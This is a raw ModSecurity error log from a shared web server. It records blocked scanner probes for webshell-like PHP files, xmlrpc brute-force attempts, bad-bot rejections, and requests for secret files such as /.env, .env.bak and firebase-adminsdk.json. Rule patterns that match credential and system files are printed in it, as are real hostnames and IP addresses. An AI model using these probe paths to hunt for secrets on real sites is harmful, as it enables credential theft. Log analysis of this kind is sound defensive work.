[Tue May 26 14:14:35.185877 2026] [security2:error] [pid 598542:tid 598726] [client 4.201.75.230:56259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/inputs.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDPwAAADY"]
[Tue May 26 14:14:35.209259 2026] [security2:error] [pid 598542:tid 598688] [client 20.151.112.53:4565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/4.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDQAAAABA"]
[Tue May 26 14:14:35.209387 2026] [security2:error] [pid 598542:tid 598688] [client 20.151.112.53:4565] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/4.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDQAAAABA"]
[Tue May 26 14:14:35.402156 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:22194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xstelth.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDSgAAADk"]
[Tue May 26 14:14:35.402260 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:22194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xstelth.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDSgAAADk"]
[Tue May 26 14:14:35.459235 2026] [security2:error] [pid 598542:tid 598768] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDSQAAAGA"], referer: https://www.anujtradingco.com/
[Tue May 26 14:14:35.748215 2026] [security2:error] [pid 598542:tid 598780] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDQwAAAGw"]
[Tue May 26 14:14:36.679842 2026] [security2:error] [pid 598542:tid 598794] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVddP4iWyZxnXeAW3JDYwAAAHo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 14:14:36.784224 2026] [ssl:error] [pid 598542:tid 598682] [client 3.233.59.216:7913] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpanel.service.google.com.anujtradingco.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:14:37.788303 2026] [security2:error] [pid 598542:tid 598679] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVddf4iWyZxnXeAW3JDfwAAAAc"]
[Tue May 26 14:14:39.569458 2026] [security2:error] [pid 598542:tid 598730] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdd_4iWyZxnXeAW3JDxQAAADo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1217746&moderation-hash=b9c58b9a9d05bfd184d31dfeca76a54d
[Tue May 26 14:14:39.742556 2026] [security2:error] [pid 598542:tid 598705] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdd_4iWyZxnXeAW3JDuwAAACE"]
[Tue May 26 14:14:40.450085 2026] [security2:error] [pid 598542:tid 598787] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdeP4iWyZxnXeAW3JD3QAAAHM"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1217746&moderation-hash=b9c58b9a9d05bfd184d31dfeca76a54d
[Tue May 26 14:14:41.450248 2026] [security2:error] [pid 598542:tid 598685] [client 4.201.75.230:56264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/ioxi-o.php"] [unique_id "ahVdef4iWyZxnXeAW3JD9wAAAA0"]
[Tue May 26 14:14:41.582552 2026] [security2:error] [pid 598542:tid 598700] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdef4iWyZxnXeAW3JD7gAAABw"]
[Tue May 26 14:14:41.984856 2026] [security2:error] [pid 598542:tid 598676] [client 202.141.30.10:65316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdef4iWyZxnXeAW3JD_wAAAAQ"]
[Tue May 26 14:14:41.985007 2026] [security2:error] [pid 598542:tid 598676] [client 202.141.30.10:65316] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdef4iWyZxnXeAW3JD_wAAAAQ"]
[Tue May 26 14:14:44.136573 2026] [security2:error] [pid 598542:tid 598681] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVde_4iWyZxnXeAW3JEMwAAAAk"]
[Tue May 26 14:14:45.324817 2026] [security2:error] [pid 598542:tid 598740] [client 91.244.65.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdfP4iWyZxnXeAW3JEYQAAAEQ"]
[Tue May 26 14:14:45.929823 2026] [security2:error] [pid 598542:tid 598756] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdff4iWyZxnXeAW3JEcgAAAFQ"]
[Tue May 26 14:14:45.959430 2026] [security2:error] [pid 598542:tid 598692] [client 95.142.47.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdff4iWyZxnXeAW3JEigAAABQ"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 14:14:48.666895 2026] [security2:error] [pid 598542:tid 598728] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdgP4iWyZxnXeAW3JE2gAAADg"]
[Tue May 26 14:14:50.833910 2026] [security2:error] [pid 598542:tid 598680] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdgv4iWyZxnXeAW3JFHAAAAAg"]
[Tue May 26 14:14:53.114652 2026] [security2:error] [pid 598542:tid 598772] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdhP4iWyZxnXeAW3JFUQAAAGQ"]
[Tue May 26 14:14:54.888307 2026] [security2:error] [pid 598542:tid 598791] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdhv4iWyZxnXeAW3JFfAAAAHc"]
[Tue May 26 14:14:54.972687 2026] [security2:error] [pid 598542:tid 598777] [client 202.141.30.10:35348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdhv4iWyZxnXeAW3JFkgAAAGk"]
[Tue May 26 14:14:54.973267 2026] [security2:error] [pid 598542:tid 598777] [client 202.141.30.10:35348] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdhv4iWyZxnXeAW3JFkgAAAGk"]
[Tue May 26 14:14:55.004091 2026] [security2:error] [pid 598542:tid 598701] [client 85.208.96.204:63388] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVdh_4iWyZxnXeAW3JFlAAAAB0"]
[Tue May 26 14:14:55.004282 2026] [security2:error] [pid 598542:tid 598701] [client 85.208.96.204:63388] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVdh_4iWyZxnXeAW3JFlAAAAB0"]
[Tue May 26 14:14:57.419195 2026] [security2:error] [pid 598542:tid 598724] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdiP4iWyZxnXeAW3JFxgAAADQ"]
[Tue May 26 14:14:59.866482 2026] [security2:error] [pid 598542:tid 598788] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdi_4iWyZxnXeAW3JGBgAAAHQ"]
[Tue May 26 14:15:02.010788 2026] [security2:error] [pid 598542:tid 598777] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdjf4iWyZxnXeAW3JGPgAAAGk"]
[Tue May 26 14:15:02.083608 2026] [security2:error] [pid 598542:tid 598703] [client 114.119.156.126:33563] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/amarone-classico/"] [unique_id "ahVdjv4iWyZxnXeAW3JGUQAAAB8"], referer: http://haddingtonwines.com/product-category/red-wine/
[Tue May 26 14:15:03.630473 2026] [security2:error] [pid 598542:tid 598776] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdj_4iWyZxnXeAW3JGcAAAAGg"]
[Tue May 26 14:15:04.068667 2026] [security2:error] [pid 598542:tid 598789] [client 202.141.30.10:65465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdj_4iWyZxnXeAW3JGiAAAAHU"]
[Tue May 26 14:15:04.068792 2026] [security2:error] [pid 598542:tid 598789] [client 202.141.30.10:65465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdj_4iWyZxnXeAW3JGiAAAAHU"]
[Tue May 26 14:15:05.847860 2026] [security2:error] [pid 598542:tid 598706] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdkf4iWyZxnXeAW3JGqQAAACI"]
[Tue May 26 14:15:08.063164 2026] [security2:error] [pid 598542:tid 598769] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdk_4iWyZxnXeAW3JG2gAAAGE"]
[Tue May 26 14:15:08.295572 2026] [security2:error] [pid 598542:tid 598551] [remote 74.7.241.58:54014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVdlP4iWyZxnXeAW3JG5wAAKAg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fa
[Tue May 26 14:15:10.890619 2026] [security2:error] [pid 598542:tid 598720] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdlv4iWyZxnXeAW3JHFgAAADA"]
[Tue May 26 14:15:12.269799 2026] [security2:error] [pid 598542:tid 598736] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdl_4iWyZxnXeAW3JHMQAAAEA"]
[Tue May 26 14:15:14.784565 2026] [security2:error] [pid 598542:tid 598771] [client 202.141.30.10:35539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdmv4iWyZxnXeAW3JHfAAAAGM"]
[Tue May 26 14:15:14.784679 2026] [security2:error] [pid 598542:tid 598771] [client 202.141.30.10:35539] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdmv4iWyZxnXeAW3JHfAAAAGM"]
[Tue May 26 14:15:15.148009 2026] [security2:error] [pid 598542:tid 598710] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdmv4iWyZxnXeAW3JHewAAACY"]
[Tue May 26 14:15:16.168086 2026] [security2:error] [pid 598542:tid 598731] [client 113.15.120.63:24001] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "newdental.com.co"] [uri "/wp-comments-post.php"] [unique_id "ahVdm_4iWyZxnXeAW3JHkQAAADs"]
[Tue May 26 14:15:17.239018 2026] [security2:error] [pid 598542:tid 598702] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdnP4iWyZxnXeAW3JHpgAAAB4"]
[Tue May 26 14:15:19.251640 2026] [security2:error] [pid 598542:tid 598787] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdnv4iWyZxnXeAW3JH2AAAAHM"]
[Tue May 26 14:15:21.102184 2026] [security2:error] [pid 598542:tid 598711] [client 45.45.237.225:48458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env"] [unique_id "ahVdof4iWyZxnXeAW3JIIQAAACc"]
[Tue May 26 14:15:21.182579 2026] [security2:error] [pid 598542:tid 598784] [client 45.45.237.225:48470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env.backup"] [unique_id "ahVdof4iWyZxnXeAW3JIIwAAAHA"]
[Tue May 26 14:15:21.194733 2026] [security2:error] [pid 598542:tid 598729] [client 45.45.237.225:48458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env.bak"] [unique_id "ahVdof4iWyZxnXeAW3JIJQAAADk"]
[Tue May 26 14:15:21.376318 2026] [security2:error] [pid 598542:tid 598702] [client 45.45.237.225:48648] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bramas.in"] [uri "/firebase-adminsdk.json"] [unique_id "ahVdof4iWyZxnXeAW3JINwAAAB4"]
[Tue May 26 14:15:21.376444 2026] [security2:error] [pid 598542:tid 598702] [client 45.45.237.225:48648] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bramas.in"] [uri "/firebase-adminsdk.json"] [unique_id "ahVdof4iWyZxnXeAW3JINwAAAB4"]
[Tue May 26 14:15:21.838360 2026] [security2:error] [pid 598542:tid 598794] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdof4iWyZxnXeAW3JIQgAAAHo"]
[Tue May 26 14:15:24.200744 2026] [security2:error] [pid 598542:tid 598764] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdo_4iWyZxnXeAW3JIiAAAAFw"]
[Tue May 26 14:15:25.033739 2026] [security2:error] [pid 598542:tid 598789] [client 110.249.202.40:18970] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/robots.txt"] [unique_id "ahVdpf4iWyZxnXeAW3JIqgAAAHU"]
[Tue May 26 14:15:25.686054 2026] [security2:error] [pid 598542:tid 598706] [client 202.141.30.10:35379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdpf4iWyZxnXeAW3JIvAAAACI"]
[Tue May 26 14:15:25.686188 2026] [security2:error] [pid 598542:tid 598706] [client 202.141.30.10:35379] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdpf4iWyZxnXeAW3JIvAAAACI"]
[Tue May 26 14:15:26.051498 2026] [security2:error] [pid 598542:tid 598748] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdpf4iWyZxnXeAW3JIuwAAAEw"]
[Tue May 26 14:15:30.425656 2026] [security2:error] [pid 598542:tid 598766] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdqv4iWyZxnXeAW3JJPwAAAF4"]
[Tue May 26 14:15:30.791941 2026] [security2:error] [pid 598542:tid 598779] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdqv4iWyZxnXeAW3JJSQAAAGs"]
[Tue May 26 14:15:30.873443 2026] [security2:error] [pid 598542:tid 598756] [client 85.204.70.118:33932] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVdqv4iWyZxnXeAW3JJXQAAAFQ"]
[Tue May 26 14:15:31.243989 2026] [security2:error] [pid 598542:tid 598794] [client 47.157.222.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdqv4iWyZxnXeAW3JJWQAAAHo"]
